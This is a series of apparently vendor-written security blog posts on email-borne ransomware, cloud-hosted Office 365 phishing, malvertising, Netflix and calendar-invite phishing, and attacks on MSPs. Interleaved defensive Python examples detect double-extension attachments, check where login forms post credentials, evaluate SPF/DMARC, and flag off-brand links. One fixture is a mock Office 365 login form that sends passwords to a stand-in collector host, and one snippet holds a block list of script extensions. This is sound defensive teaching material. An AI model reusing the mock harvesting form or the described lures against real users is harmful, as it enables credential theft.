Phorpiex Botnet Activity Surges with Large-Scale Avaddon Ransomware Campaign

Recently there has been a rise in Phorpiex botnet activity. A botnet is a group of computers that have been infected with malware, placing them under the control of the botnet operator. Those computers are then used to send spam and phishing emails, often with the aim of distributing malware and ransomware. The Phorpiex botnet is estimated to contain around 500,000 devices globally and has been in operation for about 10 years.

The Phorpiex botnet has previously been used to send sextortion emails and to distribute malware such as the Pony information stealer, GandCrab ransomware, and the XMRig cryptocurrency miner. In June, the Phorpiex botnet was used to conduct a huge Avaddon ransomware campaign in which around 2% of companies globally were targeted.

Ransomware attacks have grown in recent times, with many ransomware gangs deploying ransomware manually after gaining access to corporate networks by exploiting flaws in VPNs and other software or taking advantage of insecure default configurations. There has also been a rise in ransomware attacks that use email as the attack vector. Many ransomware variants are now distributed primarily by email, and Avaddon ransomware was one of the most serious email threats in June. In one week in June, over 1 million spam emails were sent via the Phorpiex botnet, most of them targeting U.S. firms.

Avaddon ransomware is a new ransomware variant that was first discovered in June. The operators of Avaddon run it as ransomware-as-a-service (RaaS) and have been recruiting affiliates to distribute the ransomware in return for a cut of the profits.

In early June, an Avaddon ransomware campaign was detected that used JavaScript attachments in spam emails. The files had a double extension that made them look like JPG image files on Windows computers. Windows hides known file extensions by default, so in the default configuration the attachment would appear to be named IMG123101.jpg. If Windows had been configured to display known file extensions, the user would see that the file was actually IMG123101.jpg.js. Opening the file would run the script, which launched PowerShell and Bitsadmin commands to download, install and execute Avaddon ransomware.
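The following is an added example, not code from the original article, showing how a mail gateway or triage script can catch the double-extension trick described above before Explorer's hidden extensions do their work. The extension lists and the sample attachment names (other than IMG123101.jpg.js, which the article quotes) are assumptions chosen for illustration; it also flags the related right-to-left override trick, which the article does not discuss.

```python
"""Spot double-extension attachment names like IMG123101.jpg.js.

Added example, not from the original article. The extension lists and the
sample attachment names (other than IMG123101.jpg.js, which the article
quotes) are assumptions chosen for illustration.
"""
import os

# Script and executable extensions Windows hides by default and runs on
# double-click (Windows Script Host, cmd.exe, PowerShell, PE files, shortcuts).
EXECUTABLE_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                   ".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".ps1", ".lnk"}

# Harmless-looking extensions an attacker puts in front of the real one.
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx",
              ".xls", ".xlsx", ".txt", ".zip"}

RLO = "\u202e"   # Unicode right-to-left override, also used to disguise extensions


def split_extensions(name):
    """'IMG123101.jpg.js' -> ['.jpg', '.js'] (lower-cased, outermost last)."""
    exts = []
    while True:
        name, ext = os.path.splitext(name)
        if not ext:
            return exts
        exts.insert(0, ext.lower())


def displayed_name(name):
    """Approximate what Explorer shows with 'Hide extensions for known file types' on:
    only the final, registered extension is hidden, so 'IMG123101.jpg.js' appears
    as 'IMG123101.jpg'. The two lists above stand in for the registry of known types."""
    stem, ext = os.path.splitext(name)
    return stem if ext.lower() in EXECUTABLE_EXTS or ext.lower() in DECOY_EXTS else name


def is_double_extension_lure(name):
    """True when the real (last) extension executes and the one left visible is a decoy."""
    exts = split_extensions(name)
    return len(exts) >= 2 and exts[-1] in EXECUTABLE_EXTS and exts[-2] in DECOY_EXTS


def is_executable_attachment(name):
    """True for any attachment whose real extension is a script or executable."""
    exts = split_extensions(name)
    return bool(exts) and exts[-1] in EXECUTABLE_EXTS


def triage(filenames):
    """Return {attachment name: verdict} for a batch of attachment names."""
    verdicts = {}
    for name in filenames:
        if RLO in name:
            verdicts[name] = "block: right-to-left override in filename"
        elif is_double_extension_lure(name):
            verdicts[name] = "block: double extension, displays as " + displayed_name(name)
        elif is_executable_attachment(name):
            verdicts[name] = "block: executable script"
        else:
            verdicts[name] = "allow"
    return verdicts


# Constructed sample batch: the first name is from the article, the rest are made up.
SAMPLE_ATTACHMENTS = ["IMG123101.jpg.js", "holiday.jpg", "invoice.pdf.exe",
                      "report.docx", "notes.txt"]

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_ATTACHMENTS).items():
        print(f"{name:20} {verdict}")
```

A filename check is only a first filter: the gateway should still inspect the attachment's content and MIME type, and an archive can carry the same lure inside it. On the endpoint, associating .js and the other script extensions with a text editor instead of Windows Script Host defuses this particular lure even when it reaches the inbox.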

More recently, a campaign was spotted that distributed Avaddon ransomware using spam emails with Excel spreadsheet attachments containing malicious Excel 4.0 (XLM) macros. Unlike JavaScript files, which run as soon as the user opens them, Excel macros require the user to enable them, so they are less effective. Even so, a variety of social engineering techniques are used to persuade users to enable the macros, and attacks using them still succeed.

Avaddon ransomware searches for a variety of file types, encrypts those files, and adds the .avdn extension. A ransom note is dropped that contains a link to a Tor site and a unique user ID, which the victim uses to log in and pay the ransom for the keys to unlock the encrypted files. No free decryptor is currently available for Avaddon ransomware, so files can only be recovered by paying the ransom or by restoring from viable backups that have not also been encrypted by the ransomware.

Many different subject lines have been used in the emails, such as “Your new photo?” and “Do you like my photo?”, with only a 😉 emoji in the body of the email. The tactic is simple, yet effective.

There are many steps companies can take to stop Avaddon and other email-based ransomware attacks. Security awareness training should raise awareness of the threat, teach staff how to recognize phishing and malspam, and condition them to report suspicious emails to their security team. Where possible, macros should be disabled on all end user devices, although the attachment types used change often, so disabling macros alone will not always prevent infection. The JavaScript lure described above is stopped by blocking script attachments at the email gateway and by associating .js and similar script extensions with a text editor rather than Windows Script Host on endpoints.

One of the strongest defenses against email threats such as phishing, malware and ransomware is to deploy a powerful anti-spam solution such as SpamTitan. SpamTitan can work as a standalone anti-spam solution, but also as an extra tier of protection for Office 365 email, complementing Microsoft Exchange Online Protection (EOP) and providing an additional layer of security against zero-day phishing and malware threats.

For more details on securing your organization from ransomware and other email threats, give the TitanHQ team a call now.

Phishers Leverage Google Cloud Services to Steal Office 365 Credentials

A new phishing campaign has been discovered that leverages Google Cloud Services to trick victims into handing over their Office 365 login credentials. This campaign is part of a growing trend of hiding phishing attacks behind legitimate cloud services.

The phishing attack begins like most attacks: an email containing a hyperlink is sent to the recipient, who is asked to click it. If the user clicks the link, they are taken to Google Drive, where a PDF file has been uploaded. When the file is opened, the user is asked to click a hyperlink in the document, which appears to be an invitation to open a file hosted on SharePoint Online.

The PDF file asks the victim to follow the link and sign in with their Office 365 ID. Clicking the link brings the user to a landing page hosted on Google’s storage.googleapis.com. On the landing page, the user is presented with an Office 365 login prompt that looks exactly like the real thing. After entering their credentials, they are redirected to a legitimate PDF whitepaper taken from a well-respected global consulting company.

The campaign has been designed to make it look like the victim is simply being taken to a PDF file shared via SharePoint, and the real PDF is displayed only after the victim has divulged their credentials, so the victim may never realize that their Office 365 credentials have been phished. The only sign that this is a scam is in the source code of the phishing page, which even tech-savvy users would be unlikely to check.
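The check a practitioner would actually run on that source code, as an added example that is not part of the original article or Check Point's report: find every form on the page that collects a password and see which host receives it. A genuine Office 365 prompt posts to a Microsoft sign-in host; a page on storage.googleapis.com that posts the password anywhere else is the tell. The sample HTML, the allow-list of Microsoft hosts and the collector hostname below are constructed assumptions.

```python
"""Check where a login page really posts credentials.

Added example, not from the original article or Check Point's report. The
sample HTML, the trusted-host list and the collector hostname are assumptions
used for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hosts a genuine Office 365 sign-in form is expected to post to (assumption:
# maintain this list yourself; it is deliberately short, not exhaustive).
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com", "login.microsoft.com"}


class FormCollector(HTMLParser):
    """Collects each <form> with its resolved action URL and whether it contains a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []        # dicts: {"action": absolute URL, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # An empty action posts back to the page itself; resolve relative URLs.
            action = urljoin(self.page_url, attrs.get("action") or "")
            self._current = {"action": action, "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_sinks(page_url, html):
    """Sorted list of hosts that receive a password field submitted from this page."""
    parser = FormCollector(page_url)
    parser.feed(html)
    return sorted({urlsplit(f["action"]).hostname or "" for f in parser.forms if f["has_password"]})


def assess_login_page(page_url, html):
    """'no-login-form', 'ok', or 'suspicious: credentials posted to <hosts>'."""
    sinks = credential_sinks(page_url, html)
    if not sinks:
        return "no-login-form"
    untrusted = [h for h in sinks if h not in TRUSTED_LOGIN_HOSTS]
    if untrusted:
        return "suspicious: credentials posted to " + ", ".join(untrusted)
    return "ok"


# Constructed sample resembling the landing page described above (not the real
# phishing page): an Office 365-styled form served from storage.googleapis.com
# that posts the password to a collector host (hypothetical name).
SAMPLE_URL = "https://storage.googleapis.com/example-bucket/index.html"
SAMPLE_HTML = """
<html><body>
<h1>Sign in to your account</h1>
<form method="post" action="https://collector.example.net/post.php">
  <input type="email" name="loginfmt">
  <input type="password" name="passwd">
  <button type="submit">Sign in</button>
</form>
</body></html>
"""

if __name__ == "__main__":
    print(assess_login_page(SAMPLE_URL, SAMPLE_HTML))
```

This catches plain HTML forms only. Kits that leave the action empty and ship the credentials with a JavaScript fetch or XMLHttpRequest need the script itself inspected for the destination, and a page on a cloud-storage host that posts back to itself is still suspicious because that host is not a Microsoft sign-in endpoint.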

This campaign was discovered by researchers at Check Point, but it is just one of many similar campaigns identified over the past few months. Because the hosting domains are legitimate and have valid SSL/TLS certificates, they are difficult to flag as malicious. This campaign abused Google Cloud Services, but other campaigns have been detected abusing IBM Cloud, Microsoft Azure and similar platforms to lend the attacks authenticity.

This campaign emphasizes the importance of providing security awareness training to the workforce and warning employees about the risks of following links in unsolicited emails, even links that point to real domains. An advanced email security solution should also be put in place to block malicious emails and ensure that the majority of malicious messages never reach inboxes. That is an area where TitanHQ can be of assistance.

Hackers Leveraging Inactive Domains to Attack Web Users

Hackers have begun using a new tactic to spread malware and conduct phishing attacks on unsuspecting internet users: they are hijacking inactive domains and using them to send visitors to malicious websites, in a form of malvertising attack.

Malvertising is the use of malicious code in seemingly legitimate adverts, which are often displayed on high-traffic websites. Website owners use third-party ad networks to increase revenue from their sites. Most of these adverts are genuine and lead to legitimate websites, but attackers sometimes sneak malicious code into them. Clicking the advert sends the user to a website hosting an exploit kit or a phishing form. In some cases, ‘drive-by’ malware downloads take place without any user interaction, simply because the web content loads on a vulnerable device.

The new tactic leverages domains that have expired and are no longer active. These websites may still appear in search engine result pages for key search terms. When a user enters a search and clicks the link, or follows a bookmark to a previously visited website, they arrive at a landing page explaining that the website is no longer active. Often that page includes a series of links directing the visitor to related websites.

Expired domains are often put up for sale. They can be attractive to purchasers because there may already be many existing links pointing to the domain, which is a better start than building a brand-new website from scratch. The domains are sold to the highest bidder. Researchers at Kaspersky found that cybercriminals have taken advantage of these auction-listed domains by adding links that bring visitors to malicious websites.

When a visitor lands on the site, instead of being shown the auction stub page, they are sent to a malicious website. The study found almost 1,000 domains listed for sale on a popular auction site that sent visitors to more than 2,500 unwanted URLs. In the majority of cases the URLs were ad-related pages, but 11% of the URLs were malicious and were mostly used to spread the Shlayer Trojan, a macOS malware family, via infected documents that the user is prompted to download. The Shlayer Trojan installs adware on the user’s device. Some of the sites hosted malicious code directly rather than redirecting the visitor to a different website.

These domains were once genuine websites but are now used for malicious purposes, which makes the threat hard to block on reputation alone. In some cases, the sites display different content depending on where the user is located and whether they are connecting through a VPN. The sites change content frequently, but they are indexed and categorized, and if found to be malicious they are added to real-time block lists (RBLs).

A web filtering solution like WebTitan adds protection against malvertising and redirects to malicious sites. If an attempt is made to send a user to a known malicious website, the user is shown a local block page instead, neutralizing the threat. WebTitan can also be configured to block downloads of risky file types from these web pages.

Many organizations have put firewalls in place to prevent direct attacks, use antivirus software to block malware, and use an anti-spam solution to block attacks via email, but there is a gap in their defenses: web-based threats are not effectively addressed. WebTitan allows organizations to plug that gap and control the websites staff can access.

For more information on WebTitan and filtering the internet, contact the TitanHQ team.

Beware of New Netflix Phishing Scam

Any widely used platform is a lucrative target for cybercriminals, and with more than 167 million subscribers worldwide, the Netflix streaming service certainly falls into that category. While Netflix may not appear to be a prime target for phishers, a successful attack can give scammers access to credit card and banking details.

Netflix phishing scams are common, so it is not unusual to see yet another one launched, but one of the most recent uses a novel tactic to evade security solutions. By placing a CAPTCHA challenge in front of the phishing page, the attackers make it harder for automated security scanners to reach the phishing website and identify its malicious intent.

This Netflix phishing scam starts with an email like many Netflix scams before it. The emails appear to have been sent by the Netflix customer support team and advise the recipient that there has been a problem billing the most recent monthly payment and that, as a result, the subscription will be suspended within a day.

The Netflix user is given a link to click and told they need to update the information on file. The emails also include links to unsubscribe and amend communication preferences, although these are not functional.

As with most phishing scams, there is urgency and a threat: update your details within 24 hours or lose access to the service. Clicking the link brings the user to a fully functioning CAPTCHA page, where they must complete the normal CAPTCHA checks to verify they are not a bot. Once the CAPTCHA challenge is passed, the user is taken to a hijacked domain presenting a copy of the standard Netflix sign-in page.

They must log in, then enter their billing address, full name and date of birth, and then proceed to a second page asking for their card number, expiry date and CVV code, with optional fields for their bank sort code, account number, and bank name. If those details are provided, they are told they have successfully verified their information and are redirected to the real Netflix site, most likely unaware that they have handed highly sensitive information to the phishers.

Many Netflix phishing emails have been captured over the past few months claiming that accounts have been put on hold because of payment problems. The emails are realistic and closely resemble the emails Netflix regularly sends to account holders. They include the Netflix logo and correct color scheme, and direct recipients to authentic-looking login pages.

What all of these emails have in common is that they link to a domain other than netflix.com. If you receive an email that appears to be from Netflix, especially one containing some sort of warning or threat, log in to the service by typing the real domain into the address bar, and always make sure you are on the correct website before entering any sensitive details.

Preventing Cyberattacks for Managed Services Providers

Managed service providers (MSPs) are a lucrative target for hackers. If a threat actor gains access to an MSP’s network, they can use the same remote management tools the MSP uses to attack the MSP’s clients.

Many businesses are now turning to MSPs for IT support and management services. This is typically the most cost-effective option, especially when firms lack the in-house IT expertise to manage their networks, applications, and security. An MSP typically supplies IT management services to many different firms, so a successful cyberattack on the MSP can give a threat actor access to the networks of all the MSP’s clients, which makes the attack extremely worthwhile.

There was a marked rise in cyberattacks on managed service providers in 2019, in particular by ransomware gangs using GandCrab, Sodinokibi, BitPaymer and Ryuk ransomware. The MSPs were attacked in a variety of ways, including phishing, brute force attacks on RDP, and exploitation of unpatched flaws.

Once access has been gained to an MSP’s network, attackers search for remote management tools such as Webroot SecureAnywhere and ConnectWise, which the MSP uses to access its clients’ networks to deliver IT services. Several 2019 ransomware attacks on MSPs used these tools to reach clients’ networks and deploy ransomware. MSPs such as PerCSoft, TrialWorks, BillTrust, MetroList, CloudJumper, and IT by Design were all attacked in 2019, and ransomware was deployed on their systems and on those of their clients.

Kyle Hanslovan, CEO at Huntress Labs, told ZDNet in a recent telephone interview that his company had provided support to 63 MSPs that were attacked in 2019, but he believes the total number of attacks was likely more than 100. The true number of MSPs attacked is likely to be higher still, as many cyberattacks on MSPs are probably never detected or reported.

The attacks show no sign of dropping off. Recently the U.S. Secret Service issued a TLP:GREEN alert warning MSPs of a rise in targeted cyberattacks. Compromised MSPs have been used to carry out business email compromise (BEC) attacks that divert payments to attacker-controlled accounts. Attacks have been carried out on point-of-sale (POS) systems, with malware deployed to intercept and exfiltrate credit card data, and there have been several successful ransomware attacks.

Along with financially motivated hackers, nation-state-sponsored hacking groups, notably groups linked to China, have also been attacking MSPs. The National Cybersecurity and Communications Integration Center (NCCIC) issued an alert (TA18-276B) about the threat to MSPs from state-sponsored hacking groups in October 2018.

There are many best practices MSPs can implement to improve security and prevent these attacks. MSPs may currently be extremely busy helping their clients with IT issues linked to the COVID-19 pandemic, but given the increase in targeted cyberattacks on MSPs, time should be spent improving their own security, not just their clients’.

The U.S. Secret Service advises MSPs to keep up to date with patching, especially for any remote administration tools they use. ConnectWise issued a security advisory last month and patched a vulnerability in its ConnectWise Automate solution. The API vulnerability could be exploited remotely by a threat actor to execute commands and/or make modifications within an individual Automate instance. Vulnerabilities like these are actively sought by hackers.

The principle of least privilege should be applied to access to resources, so that a compromised account or tool can reach only what it needs and the damage from a breach is contained. It is also wise to have well-defined security controls that comply with industry standards.

Annual data audits should be conducted, along with regular scans to identify malware that may have been installed on systems. Logging should be enabled and logs regularly reviewed to spot potentially malicious activity. MSPs should also ensure that employees receive ongoing security awareness training covering cybersecurity best practices and how to spot phishing and BEC scams.

Banking Credentials Targeted in iCalendar Phishing Scam

A new phishing campaign has been discovered that uses calendar invites in an attempt to steal banking and email credentials. The messages in the campaign carry an iCalendar (.ics) email attachment, which may trick employees because this file type is rarely used in phishing and is therefore unlikely to have been covered in security awareness training.

iCalendar files are the standard file format for storing scheduling and calendaring information, including tasks and events. In this campaign, the messages have the subject line “Fault Detection from Message Center” and were sent from a legitimate email account that the attackers compromised in an earlier campaign.

Because the email comes from a real account rather than a spoofed one, the messages pass checks such as SPF, DKIM, and DMARC, which are designed to identify impersonation attacks in which the true sender spoofs a domain. SPF, DKIM, and DMARC check whether the sending server is authorized to send mail for a domain and whether the message is aligned with that domain; they say nothing about whether the legitimate account holder actually wrote the message.
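To make concrete what those checks do and do not prove, here is an added example (not code from the original article) that evaluates the ip4/include/all subset of SPF against constructed records and then applies DMARC's relaxed alignment on top. The domains, IP addresses and records are assumptions standing in for DNS lookups, and DKIM is left out. The two scenarios at the bottom are the point: mail really sent from the compromised mailbox through the bank's own server passes every check, while a spoofed message from an outside server fails.

```python
"""What SPF (and DMARC alignment on top of it) actually verifies.

Added example, not from the original article. The SPF records, domains and
IP addresses below are constructed stand-ins for DNS lookups; real checks
query TXT records and also evaluate DKIM, which is omitted here.
"""
import ipaddress

# Constructed records (assumption): the bank's own mail servers plus an
# outsourced bulk mailer authorised through "include".
SPF_RECORDS = {
    "bank.example": "v=spf1 ip4:203.0.113.0/24 include:mailer.example -all",
    "mailer.example": "v=spf1 ip4:198.51.100.0/24 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(domain, sender_ip, records=SPF_RECORDS, depth=0):
    """Evaluate the ip4/ip6/include/all subset of RFC 7208 for one sending IP.

    Returns pass, fail, softfail, neutral, none or permerror. The a, mx,
    exists and redirect= terms need live DNS and are not handled here.
    """
    record = records.get(domain)
    if record is None or not record.lower().startswith("v=spf1"):
        return "none"
    if depth > 10:          # RFC 7208 caps DNS-querying terms at 10
        return "permerror"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name in ("ip4", "ip6"):
            if ip in ipaddress.ip_network(arg, strict=False):
                return QUALIFIERS[qualifier]
        elif name == "include":
            # include matches only when the referenced record itself returns pass
            if check_spf(arg, sender_ip, records, depth + 1) == "pass":
                return QUALIFIERS[qualifier]
        elif name == "all":
            return QUALIFIERS[qualifier]
    return "neutral"        # no mechanism matched and no "all" term


def organizational_domain(host):
    """Crude stand-in for the public-suffix lookup DMARC uses (assumption: last two labels)."""
    return ".".join(host.lower().split(".")[-2:])


def evaluate_message(header_from, envelope_from_domain, sender_ip, records=SPF_RECORDS):
    """SPF result plus DMARC relaxed alignment against the visible From: domain.

    DMARC passes here if SPF passes and the envelope (MAIL FROM) domain shares
    an organizational domain with the From: header address. DKIM is omitted.
    """
    spf = check_spf(envelope_from_domain, sender_ip, records)
    from_domain = header_from.rsplit("@", 1)[-1]
    aligned = organizational_domain(from_domain) == organizational_domain(envelope_from_domain)
    return {"spf": spf, "aligned": aligned,
            "dmarc": "pass" if spf == "pass" and aligned else "fail"}


if __name__ == "__main__":
    # Spoofed: an outside server claims to be the bank -> SPF fail, DMARC fail.
    print(evaluate_message("alerts@bank.example", "bank.example", "192.0.2.7"))
    # Compromised mailbox: the mail really leaves the bank's server -> all checks pass.
    print(evaluate_message("alerts@bank.example", "bank.example", "203.0.113.10"))
```

A pass therefore means only that the sending server is one the domain owner authorized. Once an attacker controls a mailbox on that server, every message they send from it is indistinguishable to SPF, DKIM and DMARC from one the real user sent, which is why content and link analysis still matter.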

As with most phishing campaigns, the attackers use fear and urgency to get users to click without considering the legitimacy of the request. In this case, the messages warn, supposedly from the bank’s security team, that withdrawals flagged as suspicious have been made from the account. The campaign targets mobile users, with the messages asking for the file to be opened on a mobile device.

If the attachment is opened, the user is shown a new calendar entry titled “Stop Unauthorized Payment” that contains a Microsoft SharePoint URL. If that link is followed, the user is redirected to a Google-hosted website running a phishing kit that spoofs the Wells Fargo login page. Both sites have valid SSL/TLS certificates, so they may not be flagged as suspicious, and both display the padlock showing that the connection between the browser and the website is encrypted, just as the real bank website does. The padlock confirms only that the connection is encrypted, not who is at the other end of it.

The user is then asked to enter their username, password, PIN, email address, email password, and account numbers. Any information entered is captured by the attacker and used to access the accounts. To make the request appear authentic, the user is redirected to the legitimate Wells Fargo website once the information has been submitted.

There are warning signs that the request is not genuine, which security-conscious users should spot. The use of SharePoint and Google domains rather than a direct link to the Wells Fargo website is suspicious, the request to open the file only on a mobile device is not explained, and the phishing site asks for far more information than a bank would, including an email address and email password, which have nothing to do with stopping a payment.
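The domain warning sign above, and the same advice given earlier for the Netflix emails (the link points somewhere other than netflix.com), can be automated. The following is an added example, not code from the original article: a small parser for the iCalendar attachment that handles RFC 5545 line folding, pulls the URLs out of the fields a calendar client renders, and reports every link whose host is not the bank's own domain or a subdomain of it. The sample invite is constructed to resemble the lure described in the text; the SharePoint tenant name is a placeholder, not the campaign's real URL.

```python
"""Extract links from an iCalendar (.ics) attachment and check which brand they really point to.

Added example, not from the original article. The sample invite is
constructed to resemble the lure described in the text; the SharePoint
tenant name is a placeholder, not the real campaign URL.
"""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def unfold(ics_text):
    """Undo RFC 5545 line folding: a line starting with a space or tab continues the previous line."""
    lines = []
    for raw in ics_text.replace("\r\n", "\n").split("\n"):
        if raw.startswith((" ", "\t")) and lines:
            lines[-1] += raw[1:]
        elif raw:
            lines.append(raw)
    return lines


def parse_events(ics_text):
    """One {PROPERTY: value} dict per VEVENT; property parameters (after ';') are dropped."""
    events, current = [], None
    for line in unfold(ics_text):
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name = name.split(";", 1)[0].upper()
        if name == "BEGIN" and value.upper() == "VEVENT":
            current = {}
        elif name == "END" and value.upper() == "VEVENT":
            events.append(current)
            current = None
        elif current is not None:
            # iCalendar TEXT values escape newlines, commas and semicolons
            current[name] = value.replace("\\n", "\n").replace("\\,", ",").replace("\\;", ";")
    return events


def links_in(event):
    """URLs in the fields a calendar client shows the user, trailing punctuation stripped."""
    found = []
    for field in ("SUMMARY", "DESCRIPTION", "LOCATION", "URL"):
        found.extend(u.rstrip(".,;)") for u in URL_RE.findall(event.get(field, "")))
    return found


def host_belongs_to(host, brand_domain):
    """True only for the brand's own domain or a subdomain of it, not look-alikes or cloud hosts."""
    host = host.lower().rstrip(".")
    return host == brand_domain or host.endswith("." + brand_domain)


def off_brand_links(ics_text, brand_domain):
    """Links in the invite whose host is not under brand_domain: the ones a user should distrust."""
    bad = []
    for event in parse_events(ics_text):
        for url in links_in(event):
            host = urlsplit(url).hostname or ""
            if not host_belongs_to(host, brand_domain):
                bad.append(url)
    return bad


# Constructed sample invite (not the real attachment): the summary line is the
# one the article quotes; the SharePoint path is a placeholder.
SAMPLE_INVITE = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "PRODID:-//constructed sample//EN\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:20200701-sample@example.invalid\r\n"
    "DTSTART:20200701T120000Z\r\n"
    "SUMMARY:Stop Unauthorized Payment\r\n"
    "DESCRIPTION:Suspicious withdrawals were detected. Review them at https://\r\n"
    " contoso.sharepoint.com/:b:/s/notice/review now (open on your mobile\r\n"
    "  device).\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

if __name__ == "__main__":
    for url in off_brand_links(SAMPLE_INVITE, "wellsfargo.com"):
        print("not a wellsfargo.com link:", url)
```

The same host_belongs_to test applied to the links in a Netflix-themed email, with netflix.com as the brand domain, rejects netflix.com.account-update.example and similar look-alikes because the check is anchored on the suffix of the host, not on whether the brand name appears in it. The parser does not handle parameter values that contain a quoted colon; for production use, parse with a full iCalendar library.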

These flags should be enough to alert most users that the request is not genuine, but any phishing email that bypasses spam filtering defenses and reaches inboxes is a danger.